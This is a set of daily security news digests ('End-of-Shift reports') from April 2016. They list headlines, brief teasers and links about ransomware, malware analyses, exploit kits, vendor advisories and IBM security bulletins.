http://www.ibm.com/support/docview.wss?uid=isg3T1023641
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in ISC BIND and Samba - including Badlock - affect IBM Netezza Host Management ***
http://www.ibm.com/support/docview.wss?uid=swg21979985
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in gnutls affect IBM Flex System Manager (FSM) (CVE-2015-2806, CVE-2015-8313) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023642
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in openLDAP affects IBM Flex System Manager (FSM) (CVE-2015-6908) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023640
---------------------------------------------
*** IBM Security Bulletin: Potential security vulnerability in IBM WebSphere Application Server for Bluemix if FIPS 140-2 is enabled (CVE-2016-0306) and multiple vulnerabilities in Samba - including Badlock (CVE-2016-2118) ***
http://www.ibm.com/support/docview.wss?uid=swg21982128
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Rational Application Developer for WebSphere Software included in Rational Developer for i and Rational Developer for AIX and Linux ***
http://www.ibm.com/support/docview.wss?uid=swg21981752
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition ***
http://www.ibm.com/support/docview.wss?uid=swg21980826
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities exist with Oracle Outside In Technology (OIT) in IBM FileNet Content Manager and IBM Content Foundation. ***
http://www.ibm.com/support/docview.wss?uid=swg21975822
---------------------------------------------
*** IBM Security Bulletin: Multiple Vulnerabilities in IBM SDK, Java Technology Edition Quarterly CPU - Jan 2016 - Includes Oracle Jan 2016 CPU + 3 IBM CVEs affects IBM Algorithmics One Core, Algo Risk Application, and Counterparty Credit Risk ***
http://www.ibm.com/support/docview.wss?uid=swg21981333
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in SQLite affects IBM Security Access Manager for Web (CVE-2015-3416) ***
http://www.ibm.com/support/docview.wss?uid=swg21981270
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in RSOC_APP_01 Frameable Response Potential Clickjacking (CSRF) affects IBM Algorithmics Algo Risk Application - CVE-2016-0207 ***
http://www.ibm.com/support/docview.wss?uid=swg21981322
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 26-04-2016 18:00 − Wednesday 27-04-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** National strategy: De Maizière wants to better protect businesses against cyber espionage ***
---------------------------------------------
Sometimes it is a complex hacker attack, sometimes the boss picks up the malware directly from the menu of his favourite restaurant. Many companies still lack awareness of the danger. That is supposed to change.
---------------------------------------------
http://heise.de/-3189372
*** All About Fraud: How Crooks Get the CVV ***
---------------------------------------------
A longtime reader recently asked: "How do online fraudsters get the 3-digit card verification value (CVV or CVV2) code printed on the back of customer cards if merchants are forbidden from storing this information?" The answer: Probably by installing a Web-based keylogger at an online merchant so that all data that customers submit to the site is copied and sent to the attacker's server.
---------------------------------------------
http://krebsonsecurity.com/2016/04/all-about-fraud-how-crooks-get-the-cvv/
*** A Look Inside Cerber Ransomware ***
---------------------------------------------
The "Cerber" family of ransomware first appeared in open source reporting in March 2016, with victims readily identified by the ".cerber" extension left on encrypted files. Unlike many other ransomware variants, Cerber is designed to encrypt a victim's file system immediately, without receiving "confirmation" or instructions from a command and control (C2) node. After this malicious encryption is complete, HTML and text files are opened on the infected...
---------------------------------------------
https://blog.team-cymru.org/2016/04/a-look-inside-cerber-ransomware/
*** Malvertising On The Pirate Bay Drops Ransomware ***
---------------------------------------------
Magnitude EK strikes again, this time on The Pirate Bay, and drops the Cerber Ransomware.
---------------------------------------------
https://blog.malwarebytes.org/threat-analysis/exploits-threat-analysis/2016…
*** Next up. A look at Locky Ransomware ***
---------------------------------------------
We've been examining some of the newer - or, at least, most currently prevalent - strains of ransomware. This time we look at Locky.
---------------------------------------------
http://www.scmagazine.com/next-up-a-look-at-locky-ransomware/article/492355/
*** 7ev3n ransomware alters name, asks for much lower ransom ***
---------------------------------------------
A variant of 7ev3n ransomware has modified its name and begun asking victims for a considerably lower ransom fee than it was seeking just a few months ago. Security researchers originally detected the 7ev3n ransomware back in January of this year.
---------------------------------------------
https://www.grahamcluley.com/2016/04/7ev3n-ransomware-alters-asks-lower-ran…
*** BSI survey: one third of companies are affected by extortion trojans ***
---------------------------------------------
According to the results of a BSI ransomware survey, 60 percent of the surveyed institutions from German industry assess the situation as having worsened. The Security Bilanz Deutschland also reports an increased threat level.
---------------------------------------------
http://heise.de/-3189776
*** "Ransomware is now the biggest threat" ***
---------------------------------------------
Trojans that encrypt systems offer criminals an easy way to make money. Victim numbers are rising, and smartphones are no longer safe either.
---------------------------------------------
http://futurezone.at/digital-life/ransomware-ist-mittlerweile-die-groesste-…
*** Digging deep for PLATINUM ***
---------------------------------------------
There is no shortage of headlines about cybercriminals launching large-scale attacks against organizations. For us, the activity groups that pose the most danger are the ones who selectively target organizations and desire to stay undetected, protect their investment, and maximize their ROI. That's what motivated us - the Windows Defender Advanced Threat Hunting team, known...
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platin…
*** Boffins believe buggy Binder embiggens Android attack surface ***
---------------------------------------------
Punching holes in problematic private APIs: Bugs in Android's Binder inter-process communication (IPC) mechanism open up a mass of security bugs, according to University of Michigan boffins Huan Feng and Kang Shin.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/27/boffins_bel…
*** Memory Forensics ***
---------------------------------------------
Introduction: This mini-course starts with memory forensics basics; in it we explain how and which artifacts you can find in memory. As memory forensics is a very vast topic, we have also explained some memory basics, such as how memory works and what the memory architecture and its units are. Also, what artifacts...
---------------------------------------------
http://resources.infosecinstitute.com/memory-forensics/
*** An Introduction to Mac memory forensics, (Tue, Apr 26th) ***
---------------------------------------------
Unfortunately, when it comes to memory forensics, the Mac environment doesn't have the luxury that we have in the Windows environment. The first step of memory forensics is capturing the memory; while in Windows we have many tools to achieve this, in Mac we have very few options. OSXPmem is the only available option for memory capturing that supports El Capitan, https://github.com/google/rekall/releases/download/v1.3.2/osxpmem_2.0.1.zip Now let [...] cd osxpmem.app/ [...] chown [...]
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20989&rss
*** How to Suck at Information Security - A Cheat Sheet ***
---------------------------------------------
This cheat sheet presents common information security mistakes, so you can avoid making them. Yeah, the idea is that you should do the opposite of what it says below. To print, use the one-sheet PDF version; you can also edit the Word version for your own needs.
---------------------------------------------
https://zeltser.com/suck-at-security-cheat-sheet/
*** [DSA 3558-1] openjdk-7 security update ***
---------------------------------------------
CVE ID: CVE-2016-0636 CVE-2016-0686 CVE-2016-0687 CVE-2016-0695 CVE-2016-3425 CVE-2016-3426 CVE-2016-3427 Several vulnerabilities have been discovered in OpenJDK, an implementation of the Oracle Java platform, resulting in breakouts of the Java sandbox, denial of service or information disclosure.
---------------------------------------------
https://lists.debian.org/debian-security-announce/2016/msg00134.html
*** VTS16-001: NetBackup Remote Access Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been identified in Veritas (formerly Symantec) NetBackup Master/ Media Servers and clients. An attacker, able to successfully access a vulnerable NetBackup host, could potentially execute arbitrary commands or operations resulting in possible unauthorized, privileged access to the targeted system.
---------------------------------------------
https://www.veritas.com/content/support/en_US/security/VTS16-001.html
*** F5 Security Advisory: glibc calloc vulnerability CVE-2015-5229 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23822215.html?…
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affect IBM Tivoli Monitoring (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976066
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition affect IBM Algorithmics Algo Risk Application and Algo One Core (CVE-2015-4872, CVE-2015-4911, CVE-2015-4893, CVE-2015-4803, ***
http://www.ibm.com/support/docview.wss?uid=swg21981349
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Provisioning Manager (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21981826
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Monitoring (CVE-2015-2601, CVE-2015-4749, CVE-2015-2625, CVE-2015-1931) ***
http://www.ibm.com/support/docview.wss?uid=swg21976560
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in HTTP Response Splitting affects IBM Algorithmics Algo Risk Application & AlgoOne Core - CVE-2015-2017 ***
http://www.ibm.com/support/docview.wss?uid=swg21981532
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 25-04-2016 18:00 − Tuesday 26-04-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** "Fourth Sample of ICS Tailored Malware Uncovered and the Potential Impact" ***
---------------------------------------------
I looked at the S4 Europe agenda which was sent out this morning by Dale Peterson and saw an interesting bullet: "Rob Caldwell of Mandiant will unveil some ICS malware in the wild that is doing some new and smarter things to attack ICS. We are working with Mandiant to provide a bit more info …
---------------------------------------------
http://ics.sans.org/blog/2016/04/25/fourth-sample-of-ics-tailored-malware-u…
*** Juniper patches Logjam, Bar Mitzvah, and various Java vulns ***
---------------------------------------------
In Junos Space, nobody can hear you patch | Juniper Networks sysadmins can add Junos Space network management patches to their to-do list.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/26/juniper_plu…
*** Shopware update fixes RCE bug that affects both shop and target system ***
---------------------------------------------
Shopware, an open-source shopping cart system chosen by a number of big European companies to power their online shops, has recently pushed out a critical security update. The update fixes a remote code execution bug that could allow attackers to read files on the target system, create new ones with malicious content, and run arbitrary code on the target system. This is a critical security vulnerability that not only affects the functions of the shop,...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/26/shopware-update-fixes-rce-bug/
*** Security report: companies fail to implement even simple protection mechanisms ***
---------------------------------------------
Forensic analyses of more than 3000 verified data breaches show that attackers come up with little that is new - because corporate networks are still not protected against the same old attack patterns.
---------------------------------------------
http://heise.de/-3184485
*** Breaking Steam Client Cryptography ***
---------------------------------------------
So as to not bury the lede: Older versions of Steam allow an attacker who observes a client connecting to Steam to read sensitive information sent over the network. This allows the attacker to take over the account, bypass SteamGuard, and sometimes view plain-text passwords. But how?
---------------------------------------------
https://steamdb.info/blog/breaking-steam-client-cryptography/
*** Malware and non-malware ways for ATM jackpotting. Extended cut ***
---------------------------------------------
Millions of people around the world now use ATMs every day to withdraw cash, pay in to their account or make a variety of payments. Unfortunately, ATM manufacturers and their primary customers - banks - don't pay much attention to the security of cash machines.
---------------------------------------------
http://securelist.com/analysis/publications/74533/malware-and-non-malware-w…
*** Two Tips to Keep Your Phone's Encrypted Messages Encrypted ***
---------------------------------------------
WhatsApp and Viber may have turned on "default" end-to-end encryption, but truly securing your messages requires a couple steps of your own.
---------------------------------------------
http://www.wired.com/2016/04/tips-for-encrypted-messages/
*** Yeabests[.]cc: A fileless infection using WMI to hijack your Browser ***
---------------------------------------------
Windows comes with a tool called the Windows Management Instrumentation, or WMI, that can be used by system administrators to receive information and notifications from Windows. ... Unfortunately, this [..] can also be used by malware developers for more nefarious reasons such as creating fileless infectors.
---------------------------------------------
http://www.bleepingcomputer.com/news/security/yeabests-cc-a-fileless-infect…
*** ENISA's Executive Director addresses EP ITRE Committee on key points for cybersecurity for the EU ***
---------------------------------------------
Following the Commission announcement on the path to digitise the EU industry, ENISA participated at the ITRE meeting on 21st April in an exchange of views on cybersecurity in the EU, and ENISA's role in the implementation of the Digital Single Market.
---------------------------------------------
https://www.enisa.europa.eu/news/enisa-news/enisa2019s-executive-director-a…
*** SWIFT banking network warns customers of cyberfraud cases ***
---------------------------------------------
SWIFT, the international banking transactions network, has warned customers of "a number" of recent incidents in which criminals sent fraudulent messages through its system. The warning from SWIFT (Society for Worldwide Interbank Financial Telecommunication) suggests that a February attack on the Bangladesh Bank, in which thieves got away with US $81 million, was not an isolated incident. SWIFT is aware of malware that "aims to reduce financial institutions' abilities"...
---------------------------------------------
http://www.cio.com/article/3061685/swift-banking-network-warns-customers-of…
*** New Decryptor Unlocks CryptXXX Ransomware ***
---------------------------------------------
Researchers at Kaspersky Lab today published a decryptor that recovers files encrypted by the CryptXXX ransomware.
---------------------------------------------
http://threatpost.com/new-decryptor-unlocks-cryptxxx-ransomware/117668/
*** Gundremmingen nuclear power plant: infection with ancient malware ***
---------------------------------------------
At the Gundremmingen nuclear power plant, at least one computer was infected with malware. On closer inspection, however, the situation appears less dramatic than initially assumed.
---------------------------------------------
http://heise.de/-3188599
*** Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC ***
---------------------------------------------
Topic: Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC Risk: Medium Text:# Exploit Title: RATS 2.3 Crash POC # Date: 25th April 2016 # Exploit Author: David Silveiro # Author Contact: twitter.com/d...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016040155
*** Bugtraq: Trend Micro (Account) - Email Spoofing Web Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538197
*** Bugtraq: VoipNow v4.0.1 - (xajax_handler) Persistent Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538198
*** Bugtraq: Sophos XG Firewall (SF01V) - Persistent Web Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538199
*** TYPO3 CMS 6.2.22 and 7.6.6 released ***
---------------------------------------------
The TYPO3 Community announces the versions 6.2.22 LTS and 7.6.6 LTS of the TYPO3 Enterprise Content Management System. We are announcing the release of the following TYPO3 CMS updates: TYPO3 CMS 6.2.22 LTS TYPO3 CMS 7.6.6 LTS All versions are maintenance releases and contain bug fixes only.
---------------------------------------------
https://typo3.org/news/article/typo3-cms-6222-and-766-released/
*** Bugtraq: [security bulletin] HPSBGN03582 rev.1 - HPE Helion CloudSystem using glibc, Remote Code Execution, Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538194
*** IBM Security Bulletin: IBM Vulnerability in BIND affects AIX (CVE-2015-8704) ***
---------------------------------------------
http://www.ibm.com/support/
*** IBM Security Bulletin: IBM Vulnerability in OpenSSL affects AIX (CVE-2016-2842) ***
---------------------------------------------
http://www.ibm.com/support/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 22-04-2016 18:00 − Monday 25-04-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Angler Exploit Kit, Bedep, and CryptXXX, (Sat, Apr 23rd) ***
---------------------------------------------
Introduction: On Friday 2016-04-15, Proofpoint researchers spotted CryptXXX [1], a new type of ransomware from the actors behind Reveton. CryptXXX is currently spread through Bedep infections sent by the Angler exploit kit (EK). So far, I've only seen Bedep send CryptXXX after Angler EK traffic caused by the pseudo-Darkleech campaign. CryptXXX infections have their own distinct look. Bedep recently improved its evasion capabilities [3]. It's being sent by one of the most...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20981&rss
*** Highlights from the 2016 HPE Annual Cyber Threat Report, (Mon, Apr 25th) ***
---------------------------------------------
HP released their annual report for 2016 that covers a broad range of information (96 pages) in various sectors and industries. The report is divided into 7 themes; those that appear the most interesting to me are Theme #5: The industry didn't learn anything about patching in 2015 and Theme #7: The monetization of malware. Theme #5: According to this report, the bug that was the most exploited in 2014 was still the most exploited last year, and it is now over five years old. CVE-2010-2568, where a...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20985&rss
*** Top 10 web hacking techniques of 2015 ***
---------------------------------------------
Now in its tenth year, the Top 10 List of Web Hacking Techniques takes a step back from the implications of an attack to understand how they happen. The list is chosen by the security research community, coordinated by WhiteHat Security. After receiving 39 submissions detailing hacking techniques discovered in 2015, the following hacks were voted into the top 10 spaces: FREAK (Factoring Attack on RSA-Export Keys) LogJam Web Timing Attacks Made Practical Evading All...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/25/top-10-web-hacking-techniques-20…
*** Critical vulnerabilities: HP Data Protector does without authentication ***
---------------------------------------------
Attackers can take on HP Data Protector through various vulnerabilities and push code onto computers. Security updates prevent this.
---------------------------------------------
http://heise.de/-3183095
*** Snap: Ubuntu's new packages are no more secure on the desktop ***
---------------------------------------------
Ubuntu maker Canonical claims that the new Snap package format makes installed apps more secure. For desktop users, however, this is not true.
---------------------------------------------
http://heise.de/-3183128
*** RDP Replay Code Release ***
---------------------------------------------
We took a more in depth look to see what information could be extracted from a PCAP of this [RDP] activity, and this led to a tool being created to replay the RDP session as the attacker would have seen it. We have made this tool available after being asked by a number of our blog readers. This tool requires the private key for decrypting, which can usually be recovered with cooperation from the client.
---------------------------------------------
http://www.contextis.com/resources/blog/rdp-replay-code-release/
*** Apple ID and iCloud: targeted phishing via text message ***
---------------------------------------------
Fraudsters are currently trying, via SMS, to lure users to a fake Apple ID login page in order to obtain personal data. The message is personally addressed.
---------------------------------------------
http://heise.de/-3183878
*** A Newer Variant of RawPOS in Depth ***
---------------------------------------------
RawPOS - A History RawPOS (also sometimes referred to as Rdasrv from the original service install name) is a Windows based malware family that targets payment card data. It has been around at least since 2011, if not much earlier. Despite it being very well known and the functions it performs easy to understand, RawPOS continues to prove extremely effective in perpetuating long-term and devastating card breaches to this day. Similar to its cousin, BlackPOS, this malware targets industries...
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/a-newer-variant-of-raw…
*** Empty DDoS Threats: Meet the Armada Collective ***
---------------------------------------------
[...] Our conclusion was a bit of a surprise: we've been unable to find a single incident where the current incarnation of the Armada Collective has actually launched a DDoS attack. In fact, because the extortion emails reuse Bitcoin addresses, there's no way the Armada Collective can tell who has paid and who has not. In spite of that, the cybercrooks have collected hundreds of thousands of dollars in extortion payments. [...]
---------------------------------------------
https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/
*** GozNym banking malware spotted now in Europe ***
---------------------------------------------
IBM's X-Force reported today the actors behind the hybrid GozNym banking trojan that stole $4 million from U.S. banks in March have released a new configuration that is targeting European banks.
---------------------------------------------
http://www.scmagazine.com/goznym-banking-malware-spotted-now-in-europe/arti…
*** Attack on central bank: cheap routers and malware lead to losses of millions ***
---------------------------------------------
One would think that a country's central bank has a firewall. In Bangladesh, that was apparently not the case. Attackers using specialised malware were thus able to transfer almost 1 billion US dollars - and then failed because of a mistake.
---------------------------------------------
http://www.golem.de/news/angriff-auf-zentralbank-billigrouter-und-malware-f…
*** Manipulated PNG file crashes iOS and Mac apps ***
---------------------------------------------
Opening a specially prepared image file crashes apps on iOS as well as OS X, including the iOS home screen. As a result, the iMessage app may no longer open.
---------------------------------------------
http://heise.de/-3184062
*** Exploit kit targets Android devices, delivers ransomware ***
---------------------------------------------
Ransomware hitting mobile devices is not nearly as widespread as that which targets computers, but Blue Coat researchers have discovered something even less unusual: mobile ransomware delivered via exploit kit. The ransomware in question calls itself Cyber.Police (the researchers have dubbed it Dogspectus), and does not encrypt users' files, just blocks the infected Android device. It purports to be part of an action by the (nonexistent) "American national security agency"...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/25/exploit-kit-targets-android-devi…
*** VU#229047: Allround Automations PL/SQL Developer v11 performs updates over HTTP ***
---------------------------------------------
Vulnerability Note VU#229047: Allround Automations PL/SQL Developer v11 performs updates over HTTP. Original Release date: 25 Apr 2016 | Last revised: 25 Apr 2016. Overview: Allround Automations PL/SQL Developer version 11 checks for updates over HTTP and does not verify updates before executing commands, which may allow an attacker to execute arbitrary code. Description: CWE-345: Insufficient Verification of Data Authenticity - CVE-2016-2346. According to the researcher, Allround Automations...
---------------------------------------------
http://www.kb.cert.org/vuls/id/229047
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in git affect PowerKVM (CVE-2016-2315, CVE-2016-2324) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023527
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in NetworkManager affect PowerKVM (CVE-2015-0272,CVE-2015-2924) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023498
---------------------------------------------
*** IBM Security Bulletin: A Security Vulnerability was fixed in IBM Security Privileged Identity Manager (CVE-2016-0357) ***
http://www.ibm.com/support/docview.wss?uid=swg21981720
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in libssh2 affects PowerKVM (CVE-2016-0787) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023482
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in ISC Bind affect PowerKVM (CVE-2016-1285, CVE-2016-1286) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023483
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in nss-util affects PowerKVM (CVE-2016-1950) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023484
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in strongSwan affects PowerKVM (CVE-2015-8023) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023447
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects Sterling Connect:Enterprise for UNIX (CVE-2016-0800). ***
http://www.ibm.com/support/docview.wss?uid=swg21980890
---------------------------------------------
*** IBM Security Bulletin: Information disclosure through unauthenticated SOAP request message. (CVE-2016-0299) ***
http://www.ibm.com/support/docview.wss?uid=swg21981155
---------------------------------------------
*** IBM Security Bulletin: ClassLoader Manipulation with Apache Struts affecting IBM WebSphere Portal (CVE-2014-0114) ***
http://www.ibm.com/support/docview.wss?uid=swg21680194
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in libssh2 affects SAN Volume Controller and Storwize Family (CVE-2015-1782) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005710
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM SAN Volume Controller and Storwize Family (CVE-2016-0475) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005709
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM WebSphere MQ (CVE-2016-0475, CVE-2015-7575, CVE-2016-0448) ***
http://www.ibm.com/support/docview.wss?uid=swg21976896
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache ActiveMQ affects IBM Control Center (CVE-2015-5254) ***
http://www.ibm.com/support/docview.wss?uid=swg21981352
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM WebSphere MQ (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21981838
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in OpenSSL affects the IBM FlashSystem model V840 (CVE-2015-3194) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005657
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in OpenSSL affects the IBM FlashSystem models 840 and 900 (CVE-2015-3194) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005656
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 21-04-2016 18:00 − Friday 22-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco Patches Denial-of-Service Flaws Across Three Products ***
---------------------------------------------
Cisco released software updates to address five separate denial of service vulnerabilities, all which the company considers either high or critical severity, across its product line this week.
---------------------------------------------
http://threatpost.com/cisco-patches-denial-of-service-flaws-across-three-pr…
*** New version of TeslaCrypt ups ante for ransomware ***
---------------------------------------------
Two updates in TeslaCrypt illustrate that ransomware is not only spreading wider, but is also evolving with new capabilities.
---------------------------------------------
http://www.scmagazine.com/new-version-of-teslacrypt-ups-ante-for-ransomware…
*** Cybercrime as a business rampant, new study ***
---------------------------------------------
Attacks are getting fiercer and attackers more sophisticated and organized, according to the "2016 Trustwave Global Security Report," released this week.
---------------------------------------------
http://www.scmagazine.com/cybercrime-as-a-business-rampant-new-study/articl…
*** South Korea no 1 origin point for DDoS attacks ***
---------------------------------------------
According to a new report by Imperva, South Korea serves as the most prolific point of origin for global DDoS attacks.
---------------------------------------------
http://www.scmagazine.com/south-korea-no-1-origin-point-for-ddos-attacks/ar…
*** SpyEye duo behind bank-account-emptying malware banged up ***
---------------------------------------------
Billion-dollar Russian Trojan team in the tank for quarter of a century in the US. A two-man team responsible for spreading the SpyEye malware that caused more than a billion dollars in financial hardship is now starting extended ..
---------------------------------------------
www.theregister.co.uk/2016/04/21/us_jails_spyeye_malware_duo/
*** DSA-3554 xen - security update ***
---------------------------------------------
Multiple vulnerabilities have been discovered in the Xen hypervisor. The Common Vulnerabilities and Exposures project identifies the following problems:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3554
*** Core Windows Utility Can Be Used to Bypass AppLocker ***
---------------------------------------------
A researcher has discovered that Windows' Regsvr32 can be used to download and run JavaScript and VBScript remotely from the Internet, bypassing AppLocker's whitelisting protections.
---------------------------------------------
http://threatpost.com/core-windows-utility-can-be-used-to-bypass-applocker/…
*** TeslaCrypt: New versions and delivery methods, no decryption tool ***
---------------------------------------------
TeslaCrypt ransomware was first spotted and analyzed in early 2015, and soon enough researchers created a decryption tool for it. The malware has since reached versions 4.0 and 4.1 but, unfortunately, there is currently no way to decrypt the ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/22/teslacrypt-new-versions-no-decry…
*** Your credentials at risk with Lansweeper 5 ***
---------------------------------------------
As penetration testers, we rarely have to find 'zero day' vulnerabilities or perform 'bug hunting' in order to compromise Windows Active Directory Domains. However, in one of these rare cases while performing an internal penetration test for a client, we had to do so. Lansweeper is ..
---------------------------------------------
http://blog.gosecure.ca/2016/04/21/your-credentials-at-risk-with-lansweeper…
*** Red Hat Product Security Risk Report: 2015 ***
---------------------------------------------
This report takes a look at the state of security risk for Red Hat products for calendar year 2015. We look at key metrics, specific vulnerabilities, and the most common ways users of Red Hat products were affected by security issues.
---------------------------------------------
https://access.redhat.com/blogs/766093/posts/2262281
*** Hacking Nagios: The Importance of System Hardening ***
---------------------------------------------
System hardening is important. Keeping systems in a hardened state is equally important. Good hardening should not only include keeping all the patches up-to-date, but also disabling all unnecessary services. The services that are necessary must be configured securely. All of this is ..
---------------------------------------------
https://blog.anitian.com/hacking-nagios/
*** Hacker attack: Printers at German universities spewed out Nazi messages ***
---------------------------------------------
Attack on networked copiers and printers apparently from the USA - security hole fixed
---------------------------------------------
http://derstandard.at/2000035504034
*** [2016-04-22] Insecure credential storage in my devolo Android app ***
---------------------------------------------
The Android app of devolo Home Control suffers from insecure credential storage. Attackers may be able to recover sensitive information from stolen/lost devices.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2016…
*** [2016-04-22] Multiple vulnerabilities in Digitalstrom Konfigurator ***
---------------------------------------------
Multiple design and implementation flaws within the smart home system Digitalstrom enable an attacker to control arbitrary devices connected to the system and execute JavaScript code in the user's browser.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2016…
*** SEC Consult Study on Smart Home Security in Germany - a first silver lining on the horizon of IoT? ***
---------------------------------------------
http://blog.sec-consult.com/2016/04/smart-home-security.html
*** 1 million people use Facebook over Tor ***
---------------------------------------------
Is it worthwhile to offer your own Tor hidden service? Facebook now writes that the number of active Tor users has doubled since last summer.
---------------------------------------------
http://www.golem.de/news/privatsphaere-1-million-menschen-nutzen-facebook-u…
*** Snap: Ubuntu's new package format is insecure under X11 ***
---------------------------------------------
Ubuntu's new Snap package format is meant not only to simplify installation and updates but also to better secure applications. Under X11, however, the latter is a false promise, says security researcher Matthew Garrett. That is not surprising.
---------------------------------------------
http://www.golem.de/news/snap-ubuntus-neues-paketformat-ist-unter-x11-unsic…
*** Why Hackers Love Your LinkedIn Profile ***
---------------------------------------------
An employee opens an attachment from someone who claims to be a colleague in a different department. The attachment turns out to be malicious. The company network? Breached. If you follow the constant news about data breaches, you read this stuff all the ..
---------------------------------------------
http://safeandsavvy.f-secure.com/2016/04/22/why-hackers-love-your-linkedin-…
*** Nuclear exploit kit bombards hundreds of thousands of computers with Locky ***
---------------------------------------------
Ransomware is being distributed on a large scale via exploit kits. Security researchers have now managed to break into the backend of one such malware distribution operation and collect statistics on the spread of the trojans.
---------------------------------------------
http://heise.de/-3181696
*** JSA10727 - 2016-04 Security Bulletin: Junos Space: Multiple privilege escalation vulnerabilities in Junos Space (CVE-2016-1265) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10727
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 20-04-2016 18:00 − Thursday 21-04-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Alleged parcel notification from the "Post" can render your data unusable through encryption ***
---------------------------------------------
Modus Operandi: The threat from alleged DHL emails has barely subsided when a new wave of emails with dangerous content reaches us. Now the email claims to come from the "Post" and informs the recipient about an unsuccessful delivery attempt. The rest of the procedure remains the same: the recipient is asked to download the shipping note via a link in the email.
---------------------------------------------
http://www.bmi.gv.at/cms/BK/betrug/files/Cryptolocker_Ransomware_Post.pdf
*** Decoding Pseudo-Darkleech (#1), (Thu, Apr 21st) ***
---------------------------------------------
I'm currently going through a phase of WordPress dPression. Either my users are exceptionally adept at finding hacked and subverted WordPress sites, or there are just so many of these sites out there. This week's particular fun seems to be happening on restaurant web sites. Inevitably, when checking out the origin of some crud, I discover a dPressing installation that shows signs of being owned for months. The subverted sites currently lead to Angler Exploit Kit (Angler EK), and are using...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20969&rss
*** SpyEye botnet kit developer sentenced to long jail term ***
---------------------------------------------
